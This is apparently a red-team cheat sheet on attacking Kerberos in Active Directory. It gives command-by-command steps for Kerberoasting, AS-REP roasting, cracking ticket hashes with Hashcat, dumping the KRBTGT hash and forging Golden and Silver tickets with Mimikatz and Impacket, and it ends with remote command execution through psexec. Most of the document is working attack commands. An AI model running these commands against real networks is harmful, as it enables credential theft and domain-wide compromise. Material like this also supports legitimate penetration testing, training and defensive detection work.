Kerberos Attacks
Kerberos is the default authentication protocol in Active Directory. Several design features can be abused to compromise credentials or forge tickets for persistence.
Kerberos Attack Flow
Kerberoasting
Kerberoasting targets service accounts by requesting a Ticket Granting Service (TGS) ticket for a service Principal Name (SPN). The TGS is encrypted with the service account's NTLM hash, which can be cracked offline. This technique works on any account that has an SPN set.
Finding Vulnerable Accounts
First, identify user accounts that have a Service Principal Name (SPN) associated with them.
PowerView:
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalnameImpacket:
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1Requesting TGS Tickets
Request the TGS ticket for the identified services. The output can be saved for offline cracking.
Rubeus:
.\Rubeus.exe kerberoast /outfile:hashes.txtImpacket (saves in hashcat format):
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1 -request -outputfile hashes.txtPowerView:
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txtCracking the Hash
Use Hashcat to crack the TGS ticket (mode 13100).
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txtTargeted Kerberoasting
If you have write access to a user object (GenericWrite/GenericAll), you can set a fake SPN on that user to make them kerberoastable.
Set SPN on target user, then kerberoast:
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1 -requestAS-REP Roasting
AS-REP Roasting targets users that have "Do not require Kerberos preauthentication" enabled. An attacker can request an AS-REP (Authentication Service Response) for these users, which contains a chunk encrypted with the user's password hash.
Enumeration & Exploitation
Identify accounts with pre-authentication disabled and request the AS-REP.
PowerView:
Get-DomainUser -PreauthNotRequired | Select-Object samaccountnameImpacket (can enumerate without creds if usernames known):
GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txtWith credentials:
GetNPUsers.py corp.local/user:password -request -format hashcat -outputfile asrep.txtRubeus:
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txtCracking AS-REP
Crack the hash using Hashcat mode 18200.
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txtForced AS-REP Roasting
If you have sufficient rights (GenericAll/GenericWrite) on a user, you can disable pre-authentication, roast the account, and then re-enable it.
Disable preauth, AS-REP roast, then re-enable:
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}Golden & Silver Tickets
Ticket forgery attacks allow attackers to create valid Kerberos tickets. Golden Tickets (TGT) grant domain-wide access, while Silver Tickets (TGS) grant access to specific services.
Golden Ticket (TGT)
Requires the KRBTGT account hash and the Domain SID. This grants complete control over the domain.
Get KRBTGT hash (requires DA or DCSync rights):
secretsdump.py corp.local/admin:password@DC_IP -just-dc-user krbtgtGet Domain SID:
Get-DomainSID
# or
lookupsid.py corp.local/user:password@DC_IPCreate Golden Ticket with Mimikatz:
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /pttCreate with Impacket:
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@DC_IPSilver Ticket (TGS)
Requires the service account hash, Domain SID, and Service SPN. Grants access to the specific service on the target host.
Create Silver Ticket for CIFS (file shares):
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:fileserver.corp.local /service:cifs /rc4:SERVICE_HASH /pttImpacket:
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-xxx -domain corp.local -spn cifs/fileserver.corp.local Administrator